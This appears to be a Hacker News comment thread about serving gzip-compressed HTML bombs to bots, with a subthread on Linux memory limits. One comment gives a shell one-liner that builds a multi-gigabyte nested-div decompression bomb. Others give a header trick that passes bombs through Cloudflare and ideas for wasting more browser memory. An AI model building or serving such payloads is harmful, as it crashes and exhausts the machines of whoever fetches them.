bhaney 2 days ago

Neat approach. I make my anti-crawler HTML zip bombs like this:

    (echo '<html><head></head><body>' && yes "<div>") | dd bs=1M count=10240 iflag=fullblock | gzip > bomb.html.gz
So they're just billions of nested div tags. Compresses just as well as repeated-single-character bombs in my experience.
  • pyman 2 days ago

    This is a great idea.

    LLM crawlers are ignoring robots.txt, breaching site terms of service, and ingesting copyrighted data for training without a licence.

    We need more ideas like this!

    • bhaney a day ago

      This is the same idea as in the article, just an alternative flavor of generating the zip bomb.

      And I actually only serve this to exploit scanners, not LLM crawlers.

      I've run a lot of websites for a long time, and I've never seen a legitimate LLM crawler ignore robots.txt. I've seen reports of that, but any time I've had a chance to look into it, it's been one of:

      - The site's robots.txt didn't actually say what the author thought they had made it say

      - The crawler had nothing to with the crawler it was claiming to be, it just hijacked a user agent to deflect blame

      It would be pretty weird, after all, for a company running a crawler to ignore robots.txt with hostile intent while also choosing to accurately ID itself to its victim.

  • _ache_ 2 days ago

    Nice command line.

chatmasta 2 days ago

Note: the submission link is not the zip bomb. It’s safe to click.

  • abirch 2 days ago

    Sounds like something a person linking to a zip bomb would say :-D

andrew_eu 2 days ago

I can imagine the large scale web scrapers just avoid processing comments entirely, so while they may unzip the bomb it could be they just discard the chunks that are inside of a comment. The same trick could be applied to other elements in the HTML though: semicolons in the style tag, some gigantic constant in inline JS, etc. If the HTML itself contained a gigantic tree of links to other zip bombs that could also have an amplifying effect on the bad scraper.

  • _ache_ 2 days ago

    There is definitively improvements that can be made. The comment part is more about aesthetic as it is not needed actually, you could have just put the zip chunk in a `div`, I guess.

PeterStuer 2 days ago

For every 1 robots.txt that is genuinly configured, there's 9 that make absolutely no sense at all.

Worse. GETing the robots.txt automatically flags you as a 'bot'!

So as a crawler that wants to respect the spirit of the robots.txt, not the inane letter that your hired cheapest junior webadmin copy/pasted there from some reddit comment, we now have to jump through hoops such as geeting hhe robots.txt from a separate vpn etc.

  • Grimblewald a day ago

    Well, robots.txt being an opaque and opt out system was broken from the start. I've just started havi g hidden links and pages only mentioned in robots.txt and any ip that tries those is immediatly blocked for 24 hours. There is no reason to continue entertaining these companies.

slig 2 days ago

If you try to do that on a site with Cloudflare, what happens? Do they read the zip file and try to cache the uncompressed content to serve it with the best compression algorithm for a given client, or do they cache the compressed file and serve it "as is"?

  • bhaney a day ago

    If you're doing this through cloudflare, you'll want to add the response header

        cache-control: no-transform
    
    so you don't bomb cloudflare when they naturally try to decompress your document, parse it, and recompress it with whatever methods the client prefers.

    That being said, you can bomb cloudflare without significant issue. It's probably a huge waste of resources for them, but they correctly handle it. I've never seen cloudflare give up before the end-client does.

  • uxjw a day ago

    Cloudflare has free AI Labyrinths if your goal is to target AI. The bots follow hidden links to a maze of unrelated content, and Cloudflare uses this to identify bots. https://blog.cloudflare.com/ai-labyrinth/

    • cyanydeez a day ago

      Do you think Meta AI's llama 4 failed so badly cause they ended up crawling a bunch of labrynths?

Alifatisk 21 hours ago

I dislike that the websites sidebar all of sudden collapses during scrolling, it shifts all the content to the left in middle of reading

fdomingues a day ago

That content shift on page scroll is horrendous. Please don't do that, there is no need to auto hide a side bar.

Telemakhos 2 days ago

Safari 18.5 (macOS) throws an error WebKitErrorDomain: 300.

can16358p 2 days ago

Crashing Safari on iOS (not technically crashing the whole app, but the tab displays internal WebKit error).

cooprh 2 days ago

Crashed 1password on safari haha

xd1936 2 days ago

Risky click

ranger_danger 2 days ago

Did not crash Firefox nor Chrome for me on Linux.

  • _ache_ 2 days ago

    Perhaps you have very generous limits on RAM allocation per thread. I have 32GB, 128 with swap and still crash (silently on Firefox and with a dedicated screen on Chrome).

    • throwaway127482 2 days ago

      Out of curiosity, how do you set these limits? I'm not the person you're replying to, but I'm just using the default limits that ship with Ubuntu 22.04

      • _ache_ 2 days ago

        Usually in /etc/limits.conf. The field `as` for address space will be my guess, but I not sure, maybe `data`. The man page `man limits.conf` isn't very descriptive.

        • inetknght 2 days ago

          > The man page `man limits.conf` isn't very descriptive.

          Looks to me like it's quite descriptive. What information do you think is missing?

          https://www.man7.org/linux/man-pages/man5/limits.conf.5.html

          • _ache_ a day ago

            What is `data` ? "maximum data size (KB)". Is `address space limit (KB)` virtual or physical ?

            What is maximum filesize in a context of a process ?! I mean what happens if a file is bigger ? Maybe it can't write bigger file than that, maybe it can't execute file bigger than that.

            I have a bunch of questions.

            • inetknght an hour ago

              > I have a bunch of questions.

              If I were reading the documentation for higher level language APIs, I'd also read the documentation for setting up/using the types that are associated.

              With well-written documentation, there's usually related information and/or see-also. Indeed, this has `SEE ALSO` for `getrlimit(2)`, which is equivalent to `man 2 getrlimit` [0].

              From there, the things are a bit more descriptive.

                     RLIMIT_AS
                            This is the maximum size of the process's virtual memory
                            (address space).  The limit is specified in bytes, and is
                            rounded down to the system page size.  This limit affects
                            calls to brk(2), mmap(2), and mremap(2), which fail with
                            the error ENOMEM upon exceeding this limit.  In addition,
                            automatic stack expansion fails (and generates a SIGSEGV
                            that kills the process if no alternate stack has been made
                            available via sigaltstack(2)).  Since the value is a long,
                            on machines with a 32-bit long either this limit is at most
                            2 GiB, or this resource is unlimited.
              
                     RLIMIT_DATA
                            This is the maximum size of the process's data segment
                            (initialized data, uninitialized data, and heap).  The
                            limit is specified in bytes, and is rounded down to the
                            system page size.  This limit affects calls to brk(2),
                            sbrk(2), and (since Linux 4.7) mmap(2), which fail with the
                            error ENOMEM upon encountering the soft limit of this
                            resource.
              
              The documentation also links to the affected system calls (`brk` [1], `sbrk` [1], `mmap` [2], `mremap` [3], and `signalstack`). Note that all of this is in section 2 and 3 of the manual for system interface calls and libraries that interact with the system. You might find some installations of linux complaining about missing documentation (eg minimalized containers and/or release distros -- documentation takes up a decent chunk of disk space and isn't generally needed outside of a developer's workstation), in which case the most likely reason is that the documentation package should be re/installed via your package manager.

              So,

              > What is `data` ? "maximum data size (KB)".

              "data" is the process's data segment [1]. Perhaps this might be clearer, but it is fairly well defined if you then read the documentation for `brk` [1]:

                     brk() and sbrk() change the location of the program break, which
                     defines the end of the process's data segment (i.e., the program
                     break is the first location after the end of the uninitialized
                     data segment).  Increasing the program break has the effect of
                     allocating memory to the process; decreasing the break deallocates
                     memory.
              
              This rabbit hole goes into describing system internals for process memory layouts [5] and it can expand pretty widely into understanding how's and why's. This level of system knowledge is literally understanding your operating system and... it's IMO well documented if you just keep searching terms that you're unfamiliar with; instead of `man` you might try `apropos` (and see `man apropos`). You'll end up exploring a huge chunk of the C-language system API, and a fair bit of glibc too.

              Then,

              > Is `address space limit (KB)` virtual or physical ?

              First sentence of the C-language documentation for RLIMIT_AS:

                     RLIMIT_AS
                            This is the maximum size of the process's virtual memory
                            (address space).
              
              > What is maximum filesize in a context of a process ?!

              System API `open()`, `opendir()`, `openat()`, [6] etc with _system file descriptors_? Well assuming your _file descriptor_ points to a file, then it's whatever the filesystem supports. But your system generally can support 32-bit-or-64-bit (depending on macros usually defined during kernel compilation) with `lseek` [7] and `off_t` [8], or you can force 64-bit bit support with `lseek64` [9] and `off64_t` [8], and fail to compile your app if your kernel wasn't compiled with 64-bit support.

              It's more complicated if you use a different API (such as C's FILE* functions [10] or etc).

              > what happens if a file is bigger?

              I'm not sure -- I've never had to worry about it because I use the 64-bit APIs. You could try mounting a filesystem supporting 64-bit files, then write a file beyond 32-bits, then boot into a 32-bit OS and try mounting it and reading the file. You'll probably get an error code that you can then look up in the documentation. If it's not clear what it is, then the kernel source code is fairly easy to navigate to find where the error could come from and what it might mean, and I've done it for mremap failures.

              > Maybe it can't write bigger file than that, maybe it can't execute file bigger than that.

              That heavily depends on system architecture and your operating system support. But unless I'm mistaken with Linux on x86_64, just about any user-land virtual address page can be marked executable; but it's different in kernel-land with reserved/register/io address space.

              And, as I understand it, the kernel memory-maps your executable from your filesystem. So, generally, user-land code can map to "anywhere" (this is good for ASLR safety) and could be executed even with minimal physical address space available. But in practice, your executable is mapped to within a certain region of the virtual address space, which leaves the other region of your address space available for allocations (this is how `brk` works). What's generally far more important is how much memory you might allocate during your program's lifecycle, and whether or not you end up fragmenting that memory.

              In any case, the documentation for `/etc/security/limits.conf` (linked earlier) states:

                     If a hard limit or soft limit of a resource is set to a valid
                     value, but outside of the supported range of the local system, the
                     system may reject the new limit or unexpected behavior may occur.
                     If the control value required is used, the module will reject the
                     login if a limit could not be set.
              
              If you set your limits so low that you can't start processes because you run out of address space while trying to load them, then that might be classified as "unexpected behavior" if you didn't expect that to happen and so is... well documented. I don't see where it says anything about "valid value" or "supported range" for specific limits, but for those I would just poke around the kernel source code [11] where those C macros are used and look for limits around them. `grep -nR` [12] is what I'd use for that.

              That's enough rabbit hole for me.

              [0]: https://www.man7.org/linux/man-pages/man2/getrlimit.2.html

              [1]: https://www.man7.org/linux/man-pages/man2/brk.2.html

              [2]: https://www.man7.org/linux/man-pages/man2/mmap.2.html

              [3]: https://www.man7.org/linux/man-pages/man2/mremap.2.html

              [4]: https://www.man7.org/linux/man-pages/man2/sigaltstack.2.html

              [5]: https://en.wikipedia.org/wiki/Executable_and_Linkable_Format

              [6]: https://man7.org/linux/man-pages/man2/open.2.html

              [7]: https://man7.org/linux/man-pages/man2/lseek.2.html

              [8]: https://man7.org/linux/man-pages/man3/off64_t.3type.html

              [9]: https://man7.org/linux/man-pages/man3/lseek64.3.html

              [10]: https://man7.org/linux/man-pages/man3/file.3type.html

              [11]: https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/lin...

              [12]: https://man7.org/linux/man-pages/man1/grep.1.html

  • AndrewThrowaway 18 hours ago

    Crashed Chrome tab on Windows instantly but Firefox is fine. It shows loading but pressing Ctrl + U even shows the very start of that fake HTML.

  • palmfacehn 2 days ago

    Try creating one with deeply nested tags. Recursively adding more nodes via scripting is another memory waster. From there you might consider additional changes to the CSS that cause the document to repaint.

    • meinersbur 2 days ago

      It will also compress worse, making it less like a zip bomb and more like a huge document. Nothing against that, but the article's trick is just to stop a parser to bail early.

      • palmfacehn 2 days ago

        For my usage, the compressed size difference with deeply nested divs was negligible.

  • esperent 2 days ago

    It crashed the tab in Brave on Android for me.

  • johnisgood 2 days ago

    It crashed the tab on Vivaldi (Linux).

Tepix 2 days ago

Imagine you‘re a crawler operator. Do you really have a problem with documents like this? I don’t think so.